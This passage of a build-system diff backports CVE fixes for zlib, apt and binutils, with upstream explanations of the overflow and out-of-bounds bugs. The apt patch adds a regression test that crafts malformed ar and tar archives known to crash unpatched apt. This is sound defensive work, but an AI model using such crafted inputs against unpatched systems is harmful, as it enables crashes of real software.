+- (5L+extra_dbits[dcode]);
+- }
+- out_length >>= 3;
+- Tracev((stderr,"\nlast_lit %u, in %ld, out ~%ld(%ld%%) ",
+- s->last_lit, in_length, out_length,
+- 100L - out_length*100L/in_length));
+- if (s->matches < s->last_lit/2 && out_length < in_length/2) return 1;
+- }
+-#endif
+- return (s->last_lit == s->lit_bufsize-1);
+- /* We avoid equality with lit_bufsize because of wraparound at 64K
+- * on 16 bit machines and because stored blocks are restricted to
+- * 64K-1 bytes.
+- */
++ return (s->sym_next == s->sym_end);
+ }
+
+ /* ===========================================================================
+@@ -1069,13 +1047,14 @@ local void compress_block(s, ltree, dtree)
+ {
+ unsigned dist; /* distance of matched string */
+ int lc; /* match length or unmatched char (if dist == 0) */
+- unsigned lx = 0; /* running index in l_buf */
++ unsigned sx = 0; /* running index in sym_buf */
+ unsigned code; /* the code to send */
+ int extra; /* number of extra bits to send */
+
+- if (s->last_lit != 0) do {
+- dist = s->d_buf[lx];
+- lc = s->l_buf[lx++];
++ if (s->sym_next != 0) do {
++ dist = s->sym_buf[sx++] & 0xff;
++ dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
++ lc = s->sym_buf[sx++];
+ if (dist == 0) {
+ send_code(s, lc, ltree); /* send a literal byte */
+ Tracecv(isgraph(lc), (stderr," '%c' ", lc));
+@@ -1100,11 +1079,10 @@ local void compress_block(s, ltree, dtree)
+ }
+ } /* literal or match pair ? */
+
+- /* Check that the overlay between pending_buf and d_buf+l_buf is ok: */
+- Assert((uInt)(s->pending) < s->lit_bufsize + 2*lx,
+- "pendingBuf overflow");
++ /* Check that the overlay between pending_buf and sym_buf is ok: */
++ Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");
+
+- } while (lx < s->last_lit);
++ } while (sx < s->sym_next);
+
+ send_code(s, END_BLOCK, ltree);
+ }
diff --git a/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
new file mode 100644
index 0000000000..d29e6e0f1f
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
@@ -0,0 +1,44 @@
+From 8617d83d6939754ae3a04fc2d22daa18eeea2a43 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 17 Aug 2022 10:15:57 +0530
+Subject: [PATCH] CVE-2022-37434
+
+Upstream-Status: Backport [https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1 & https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d]
+CVE: CVE-2022-37434
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Fix a bug when getting a gzip header extra field with inflate().
+
+If the extra field was larger than the space the user provided with
+inflateGetHeader(), and if multiple calls of inflate() delivered
+the extra header data, then there could be a buffer overflow of the
+provided space. This commit assures that provided space is not
+exceeded.
+
+ Fix extra field processing bug that dereferences NULL state->head.
+
+The recent commit to fix a gzip header extra field processing bug
+introduced the new bug fixed here.
+---
+ inflate.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/inflate.c b/inflate.c
+index ac333e8..cd01857 100644
+--- a/inflate.c
++++ b/inflate.c
+@@ -759,8 +759,9 @@ int flush;
+ if (copy > have) copy = have;
+ if (copy) {
+ if (state->head != Z_NULL &&
+- state->head->extra != Z_NULL) {
+- len = state->head->extra_len - state->length;
++ state->head->extra != Z_NULL &&
++ (len = state->head->extra_len - state->length) <
++ state->head->extra_max) {
+ zmemcpy(state->head->extra + len, next,
+ len + copy > state->head->extra_max ?
+ state->head->extra_max - len : copy);
+--
+2.25.1
+
diff --git a/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
new file mode 100644
index 0000000000..654579eb81
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
@@ -0,0 +1,40 @@
+From 73331a6a0481067628f065ffe87bb1d8f787d10c Mon Sep 17 00:00:00 2001
+From: Hans Wennborg <hans@chromium.org>
+Date: Fri, 18 Aug 2023 11:05:33 +0200
+Subject: [PATCH] Reject overflows of zip header fields in minizip.
+
+This checks the lengths of the file name, extra field, and comment
+that would be put in the zip headers, and rejects them if they are
+too long. They are each limited to 65535 bytes in length by the zip
+format. This also avoids possible buffer overflows if the provided
+fields are too long.
+
+Upstream-Status: Backport from [https://github.com/madler/zlib/commit/73331a6a0481067628f065ffe87bb1d8f787d10c]
+CVE: CVE-2023-45853
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ contrib/minizip/zip.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/contrib/minizip/zip.c b/contrib/minizip/zip.c
+index 3d3d4cadd..0446109b2 100644
+--- a/contrib/minizip/zip.c
++++ b/contrib/minizip/zip.c
+@@ -1043,6 +1043,17 @@ extern int ZEXPORT zipOpenNewFileInZip4_64(zipFile file, const char* filename, c
+ return ZIP_PARAMERROR;
+ #endif
+
++ // The filename and comment length must fit in 16 bits.
++ if ((filename!=NULL) && (strlen(filename)>0xffff))
++ return ZIP_PARAMERROR;
++ if ((comment!=NULL) && (strlen(comment)>0xffff))
++ return ZIP_PARAMERROR;
++ // The extra field length must fit in 16 bits. If the member also requires
++ // a Zip64 extra block, that will also need to fit within that 16-bit
++ // length, but that will be checked for later.
++ if ((size_extrafield_local>0xffff) || (size_extrafield_global>0xffff))
++ return ZIP_PARAMERROR;
++
+ zi = (zip64_internal*)file;
+
+ if (zi->in_opened_file_inzip == 1)
diff --git a/meta/recipes-core/zlib/zlib_1.2.11.bb b/meta/recipes-core/zlib/zlib_1.2.11.bb
index ef9431ae47..9355f0556e 100644
--- a/meta/recipes-core/zlib/zlib_1.2.11.bb
+++ b/meta/recipes-core/zlib/zlib_1.2.11.bb
@@ -8,7 +8,10 @@ LIC_FILES_CHKSUM = "file://zlib.h;beginline=6;endline=23;md5=5377232268e952e9ef6
SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \
file://ldflags-tests.patch \
+ file://CVE-2018-25032.patch \
file://run-ptest \
+ file://CVE-2022-37434.patch \
+ file://CVE-2023-45853.patch \
"
UPSTREAM_CHECK_URI = "http://zlib.net/"
@@ -50,3 +53,6 @@ do_install_append_class-target() {
}
BBCLASSEXTEND = "native nativesdk"
+
+# this CVE is for cloudflare zlib
+CVE_CHECK_WHITELIST += "CVE-2023-6992"
diff --git a/meta/recipes-devtools/apt/apt.inc b/meta/recipes-devtools/apt/apt.inc
index 13f5969f86..251795eeca 100644
--- a/meta/recipes-devtools/apt/apt.inc
+++ b/meta/recipes-devtools/apt/apt.inc
@@ -2,6 +2,7 @@ SUMMARY = "Advanced front-end for dpkg"
DESCRIPTION = "Provides command-line tools for searching and managing as well \
as querying information about packages as a low-level access to all features \
of the libapt-pkg library."
+HOMEPAGE = "https://packages.debian.org/jessie/apt"
LICENSE = "GPLv2.0+"
SECTION = "base"
@@ -17,6 +18,7 @@ SRC_URI = "https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/${BPN}/${P
file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \
file://0001-apt-1.2.12-Fix-musl-build.patch \
file://0001-Include-array.h-for-std-array.patch \
+ file://CVE-2020-3810.patch \
"
SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9"
SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059"
@@ -35,5 +37,9 @@ do_configure_prepend() {
rm -rf ${S}/buildlib/config.guess
}
+# there are code generation issues with some compilers in the SHA256 implementation
+# turn off strict-aliasing to avoid these issues
+CXXFLAGS_append = " -fno-strict-aliasing"
+
USERADD_PACKAGES = "${PN}"
USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt"
diff --git a/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
new file mode 100644
index 0000000000..cf1206a3fa
--- /dev/null
+++ b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
@@ -0,0 +1,174 @@
+From dceb1e49e4b8e4dadaf056be34088b415939cda6 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Tue, 12 May 2020 11:49:09 +0200
+Subject: [PATCH] SECURITY UPDATE: Fix out of bounds read in .ar and .tar
+ implementation (CVE-2020-3810)
+
+When normalizing ar member names by removing trailing whitespace
+and slashes, an out-of-bounds read can be caused if the ar member
+name consists only of such characters, because the code did not
+stop at 0, but would wrap around and continue reading from the
+stack, without any limit.
+
+Add a check to abort if we reached the first character in the
+name, effectively rejecting the use of names consisting just
+of slashes and spaces.
+
+Furthermore, certain error cases in arfile.cc and extracttar.cc have
+included member names in the output that were not checked at all and
+might hence not be nul terminated, leading to further out of bound reads.
+
+Fixes Debian/apt#111
+LP: #1878177
+
+CVE: CVE-2020-3810
+
+Upstream-Status: Backport:
+https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ apt-inst/contrib/arfile.cc | 11 ++-
+ apt-inst/contrib/extracttar.cc | 2 +-
+ .../test-github-111-invalid-armember | 88 +++++++++++++++++++
+ 3 files changed, 98 insertions(+), 3 deletions(-)
+ create mode 100755 test/integration/test-github-111-invalid-armember
+
+diff --git a/apt-inst/contrib/arfile.cc b/apt-inst/contrib/arfile.cc
+index 3fc3afedb..5cb43c690 100644
+--- a/apt-inst/contrib/arfile.cc
++++ b/apt-inst/contrib/arfile.cc
+@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()
+ StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
+ {
+ delete Memb;
+- return _error->Error(_("Invalid archive member header %s"), Head.Name);
++ return _error->Error(_("Invalid archive member header"));
+ }
+
+ // Check for an extra long name string
+@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()
+ else
+ {
+ unsigned int I = sizeof(Head.Name) - 1;
+- for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--);
++ for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--)
++ {
++ if (I == 0)
++ {
++ delete Memb;
++ return _error->Error(_("Invalid archive member header"));
++ }
++ }
+ Memb->Name = std::string(Head.Name,I+1);
+ }
+
+diff --git a/apt-inst/contrib/extracttar.cc b/apt-inst/contrib/extracttar.cc
+index 9bb0a55c0..b22f59dbc 100644
+--- a/apt-inst/contrib/extracttar.cc
++++ b/apt-inst/contrib/extracttar.cc
+@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)
+
+ default:
+ BadRecord = true;
+- _error->Warning(_("Unknown TAR header type %u, member %s"),(unsigned)Tar->LinkFlag,Tar->Name);
++ _error->Warning(_("Unknown TAR header type %u"), (unsigned)Tar->LinkFlag);
+ break;
+ }
+
+diff --git a/test/integration/test-github-111-invalid-armember b/test/integration/test-github-111-invalid-armember
+new file mode 100755
+index 000000000..ec2163bf6
+--- /dev/null
++++ b/test/integration/test-github-111-invalid-armember
+@@ -0,0 +1,88 @@
++#!/bin/sh
++set -e
++
++TESTDIR="$(readlink -f "$(dirname "$0")")"
++. "$TESTDIR/framework"
++setupenvironment
++configarchitecture "amd64"
++setupaptarchive
++
++# this used to crash, but it should treat it as an invalid member header
++touch ' '
++ar -q test.deb ' '
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++rm test.deb
++touch 'x'
++ar -q test.deb 'x'
++testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# <name><size> [ other fields] - name is not nul terminated here, it ends in .
++msgmsg "Unterminated ar member name"
++printf '!<arch>\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' > test.deb
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# unused source code for generating $tar below
++maketar() {
++ cat > maketar.c << EOF
++ #include <stdio.h>
++ #include <string.h>
++ struct tar {
++ char Name[100];
++ char Mode[8];
++ char UserID[8];
++ char GroupID[8];
++ char Size[12];
++ char MTime[12];
++ char Checksum[8];
++ char LinkFlag;
++ char LinkName[100];
++ char MagicNumber[8];
++ char UserName[32];
++ char GroupName[32];
++ char Major[8];
++ char Minor[8];
++ };
++
++ int main(void)
++ {
++ union {
++ struct tar t;
++ char buf[512];
++ } t;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ t.buf[i] = '7';
++ memcpy(t.t.Name, "unterminatedName", 16);
++ memcpy(t.t.UserName, "userName", 8);
++ memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
++ t.t.LinkFlag = 'X'; // I AM BROKEN
++ memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));
++ memset(t.t.Checksum,' ',sizeof(t.t.Checksum));
++
++ unsigned long sum = 0;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ sum += t.buf[i];
++
++ int written = sprintf(t.t.Checksum, "%lo", sum);
++ for (int i = written; i < sizeof(t.t.Checksum); i++)
++ t.t.Checksum[i] = ' ';
++ fwrite(t.buf, sizeof(t.buf), 1, stdout);
++ }
++EOF
++
++ gcc maketar.c -o maketar -Wall
++ ./maketar
++}
++
++
++#
++tar="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544 X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"
++printf '%s' "$tar" | gzip > control.tar.gz
++cp control.tar.gz data.tar.gz
++touch debian-binary
++rm test.deb
++ar -q test.deb debian-binary control.tar.gz data.tar.gz
++testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
+--
+GitLab
diff --git a/meta/recipes-devtools/binutils/binutils-2.34.inc b/meta/recipes-devtools/binutils/binutils-2.34.inc
index b5f5a1c69a..032263fe63 100644
--- a/meta/recipes-devtools/binutils/binutils-2.34.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.34.inc
@@ -24,7 +24,7 @@ BRANCH ?= "binutils-2_34-branch"
UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
-SRCREV ?= "d4b50999b3b287b5f984ade2f8734aa8c9359440"
+SRCREV ?= "c4e78c0868a22971680217a41fdb73516a26813d"
BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git"
SRC_URI = "\
${BINUTILS_GIT_URI} \
@@ -42,7 +42,25 @@ SRC_URI = "\
file://0015-sync-with-OE-libtool-changes.patch \
file://0016-Check-for-clang-before-checking-gcc-version.patch \
file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \
+ file://0018-Include-members-in-the-variable-table-used-when-reso.patch \
file://CVE-2020-0551.patch \
file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \
+ file://CVE-2020-16592.patch \
+ file://CVE-2020-16598.patch \
+ file://CVE-2021-20197.patch \
+ file://CVE-2021-3487.patch \
+ file://CVE-2021-3549.patch \
+ file://CVE-2020-16593.patch \
+ file://0001-CVE-2021-45078.patch \
+ file://CVE-2022-38533.patch \
+ file://CVE-2023-25588.patch \
+ file://CVE-2021-46174.patch \
+ file://CVE-2023-25584.patch \
+ file://CVE-2022-47007.patch \
+ file://CVE-2022-47008.patch \
+ file://CVE-2022-47010.patch \
+ file://CVE-2022-47011.patch \
+ file://CVE-2022-48063.patch \
+ file://CVE-2022-47695.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
new file mode 100644
index 0000000000..2af82477ac
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
@@ -0,0 +1,257 @@
+From 161e87d12167b1e36193385485c1f6ce92f74f02 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Dec 2021 11:48:42 +1030
+Subject: [PATCH] PR28694, Out-of-bounds write in stab_xcoff_builtin_type
+
+ PR 28694
+ * stabs.c (stab_xcoff_builtin_type): Make typenum unsigned.
+ Negate typenum earlier, simplifying bounds checking. Correct
+ off-by-one indexing. Adjust switch cases.
+
+
+CVE: CVE-2021-45078
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=161e87d12167b1e36193385485c1f6ce92f74f02]
+
+Signed-off-by: Sundeep KOKKONDA <sundeep.kokkonda@gmail.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ binutils/stabs.c | 87 ++++++++++++++++++++++++------------------------
+ 1 file changed, 43 insertions(+), 44 deletions(-)
+
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 274bfb0e7fa..83ee3ea5fa4 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -202,7 +202,7 @@ static debug_type stab_find_type (void *, struct stab_handle *, const int *);
+ static bfd_boolean stab_record_type
+ (void *, struct stab_handle *, const int *, debug_type);
+ static debug_type stab_xcoff_builtin_type
+- (void *, struct stab_handle *, int);
++ (void *, struct stab_handle *, unsigned int);
+ static debug_type stab_find_tagged_type
+ (void *, struct stab_handle *, const char *, int, enum debug_type_kind);
+ static debug_type *stab_demangle_argtypes
+@@ -3496,166 +3496,167 @@ stab_record_type (void *dhandle ATTRIBUTE_UNUSED, struct stab_handle *info,
+
+ static debug_type
+ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+- int typenum)
++ unsigned int typenum)
+ {
+ debug_type rettype;
+ const char *name;
+
+- if (typenum >= 0 || typenum < -XCOFF_TYPE_COUNT)
++ typenum = -typenum - 1;
++ if (typenum >= XCOFF_TYPE_COUNT)
+ {
+- fprintf (stderr, _("Unrecognized XCOFF type %d\n"), typenum);
++ fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);
+ return DEBUG_TYPE_NULL;
+ }
+- if (info->xcoff_types[-typenum] != NULL)
+- return info->xcoff_types[-typenum];
++ if (info->xcoff_types[typenum] != NULL)
++ return info->xcoff_types[typenum];
+
+- switch (-typenum)
++ switch (typenum)
+ {
+- case 1:
++ case 0:
+ /* The size of this and all the other types are fixed, defined
+ by the debugging format. */
+ name = "int";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 2:
++ case 1:
+ name = "char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 3:
++ case 2:
+ name = "short";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 4:
++ case 3:
+ name = "long";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 5:
++ case 4:
+ name = "unsigned char";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 6:
++ case 5:
+ name = "signed char";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 7:
++ case 6:
+ name = "unsigned short";
+ rettype = debug_make_int_type (dhandle, 2, TRUE);
+ break;
+- case 8:
++ case 7:
+ name = "unsigned int";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 9:
++ case 8:
+ name = "unsigned";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 10:
++ case 9:
+ name = "unsigned long";
+ rettype = debug_make_int_type (dhandle, 4, TRUE);
+ break;
+- case 11:
++ case 10:
+ name = "void";
+ rettype = debug_make_void_type (dhandle);
+ break;
+- case 12:
++ case 11:
+ /* IEEE single precision (32 bit). */
+ name = "float";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 13:
++ case 12:
+ /* IEEE double precision (64 bit). */
+ name = "double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 14:
++ case 13:
+ /* This is an IEEE double on the RS/6000, and different machines
+ with different sizes for "long double" should use different
+ negative type numbers. See stabs.texinfo. */
+ name = "long double";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 15:
++ case 14:
+ name = "integer";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 16:
++ case 15:
+ name = "boolean";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 17:
++ case 16:
+ name = "short real";
+ rettype = debug_make_float_type (dhandle, 4);
+ break;
+- case 18:
++ case 17:
+ name = "real";
+ rettype = debug_make_float_type (dhandle, 8);
+ break;
+- case 19:
++ case 18:
+ /* FIXME */
+ name = "stringptr";
+ rettype = NULL;
+ break;
+- case 20:
++ case 19:
+ /* FIXME */
+ name = "character";
+ rettype = debug_make_int_type (dhandle, 1, TRUE);
+ break;
+- case 21:
++ case 20:
+ name = "logical*1";
+ rettype = debug_make_bool_type (dhandle, 1);
+ break;
+- case 22:
++ case 21:
+ name = "logical*2";
+ rettype = debug_make_bool_type (dhandle, 2);
+ break;
+- case 23:
++ case 22:
+ name = "logical*4";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 24:
++ case 23:
+ name = "logical";
+ rettype = debug_make_bool_type (dhandle, 4);
+ break;
+- case 25:
++ case 24:
+ /* Complex type consisting of two IEEE single precision values. */
+ name = "complex";
+ rettype = debug_make_complex_type (dhandle, 8);
+ break;
+- case 26:
++ case 25:
+ /* Complex type consisting of two IEEE double precision values. */
+ name = "double complex";
+ rettype = debug_make_complex_type (dhandle, 16);
+ break;
+- case 27:
++ case 26:
+ name = "integer*1";
+ rettype = debug_make_int_type (dhandle, 1, FALSE);
+ break;
+- case 28:
++ case 27:
+ name = "integer*2";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 29:
++ case 28:
+ name = "integer*4";
+ rettype = debug_make_int_type (dhandle, 4, FALSE);
+ break;
+- case 30:
++ case 29:
+ /* FIXME */
+ name = "wchar";
+ rettype = debug_make_int_type (dhandle, 2, FALSE);
+ break;
+- case 31:
++ case 30:
+ name = "long long";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+- case 32:
++ case 31:
+ name = "unsigned long long";
+ rettype = debug_make_int_type (dhandle, 8, TRUE);
+ break;
+- case 33:
++ case 32:
+ name = "logical*8";
+ rettype = debug_make_bool_type (dhandle, 8);
+ break;
+- case 34:
++ case 33:
+ name = "integer*8";
+ rettype = debug_make_int_type (dhandle, 8, FALSE);
+ break;
+@@ -3664,9 +3665,7 @@ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+ }
+
+ rettype = debug_name_type (dhandle, name, rettype);
+-
+- info->xcoff_types[-typenum] = rettype;
+-
++ info->xcoff_types[typenum] = rettype;
+ return rettype;
+ }
+
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
index 11a8110d40..88cce49e46 100644
--- a/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
+++ b/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch
@@ -1,4 +1,4 @@
-From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001
+From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001
From: Khem Raj <raj.khem@gmail.com>
Date: Fri, 15 Jan 2016 06:31:09 +0000
Subject: [PATCH] warn for uses of system directories when cross linking
@@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com>
ld/ldfile.c | 17 +++++++++++++++++
ld/ldlex.h | 2 ++
ld/ldmain.c | 2 ++
- ld/lexsup.c | 15 +++++++++++++++
- 9 files changed, 85 insertions(+)
+ ld/lexsup.c | 16 ++++++++++++++++
+ 9 files changed, 86 insertions(+)
diff --git a/ld/config.in b/ld/config.in
index d93c9b0830..5da2742bea 100644
@@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644
#undef EXTRA_SHLIB_EXTENSION
diff --git a/ld/configure b/ld/configure
-index 811134a503..f8c17c19ae 100755
+index f432f4637d..a9da3c115e 100755
--- a/ld/configure
+++ b/ld/configure
-@@ -826,6 +826,7 @@ with_lib_path
+@@ -830,6 +830,7 @@ with_lib_path
enable_targets
enable_64_bit_bfd
with_sysroot
@@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755
enable_gold
enable_got
enable_compressed_debug_sections
-@@ -1491,6 +1492,8 @@ Optional Features:
+@@ -1495,6 +1496,8 @@ Optional Features:
--disable-largefile omit support for large files
--enable-targets alternative target configurations
--enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes)
@@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755
--enable-gold[=ARG] build gold [ARG={default,yes,no}]
--enable-got=<type> GOT handling scheme (target, single, negative,
multigot)
-@@ -15788,6 +15791,19 @@ fi
+@@ -16624,6 +16627,19 @@ fi
@@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644
/* The initial parser states. */
diff --git a/ld/ldmain.c b/ld/ldmain.c
-index da1ad17763..12d0b07d8a 100644
+index c4af10f4e9..95b56b2d2d 100644
--- a/ld/ldmain.c
+++ b/ld/ldmain.c
-@@ -274,6 +274,8 @@ main (int argc, char **argv)
+@@ -273,6 +273,8 @@ main (int argc, char **argv)
command_line.warn_mismatch = TRUE;
command_line.warn_search_mismatch = TRUE;
command_line.check_section_addresses = -1;
@@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644
/* We initialize DEMANGLING based on the environment variable
COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the
diff --git a/ld/lexsup.c b/ld/lexsup.c
-index 3d15cc491d..0e8b4f2b7a 100644
+index 3d15cc491d..6478821443 100644
--- a/ld/lexsup.c
+++ b/ld/lexsup.c
@@ -550,6 +550,14 @@ static const struct ld_option ld_options[] =
@@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644
};
#define OPTION_COUNT ARRAY_SIZE (ld_options)
-@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv)
-
+@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv)
case OPTION_PRINT_MAP_DISCARDED:
config.print_map_discarded = TRUE;
+ break;
+
+ case OPTION_NO_POISON_SYSTEM_DIRECTORIES:
+ command_line.poison_system_directories = FALSE;
@@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644
+
+ case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES:
+ command_line.error_poison_system_directories = TRUE;
- break;
++ break;
}
}
diff --git a/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
new file mode 100644
index 0000000000..dc1e09d46b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch
@@ -0,0 +1,32 @@
+From bf2252dca8c76e4c1f1c2dbf98dab7ffc9f5e5af Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Sat, 29 Aug 2020 08:03:15 +0100
+Subject: [PATCH] Include members in the variable table used when resolving
+ DW_AT_specification tags.
+
+ PR 26520
+ * dwarf2.c (scan_unit_for_symbols): Add member entries to the
+ variable table.
+
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=e6f04d55f681149a69102a73937d0987719c3f16]
+---
+ bfd/dwarf2.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index dd3568a8532..ef2f6a3c63c 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -3248,7 +3248,8 @@ scan_unit_for_symbols (struct comp_unit *unit)
+ else
+ {
+ func = NULL;
+- if (abbrev->tag == DW_TAG_variable)
++ if (abbrev->tag == DW_TAG_variable
++ || abbrev->tag == DW_TAG_member)
+ {
+ bfd_size_type amt = sizeof (struct varinfo);
+ var = (struct varinfo *) bfd_zalloc (abfd, amt);
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
new file mode 100644
index 0000000000..f5f9ccdd53
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch
@@ -0,0 +1,61 @@
+From 7ecb51549ab1ec22aba5aaf34b70323cf0b8509a Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Apr 2020 18:58:11 +0930
+Subject: [PATCH] PR25823, Use after free in bfd_hash_lookup
+
+ PR 25823
+ * peXXigen.c (_bfd_XXi_swap_sym_in <C_SECTION>): Don't use a
+ pointer into strings that may be freed for section name, always
+ allocate a new string.
+
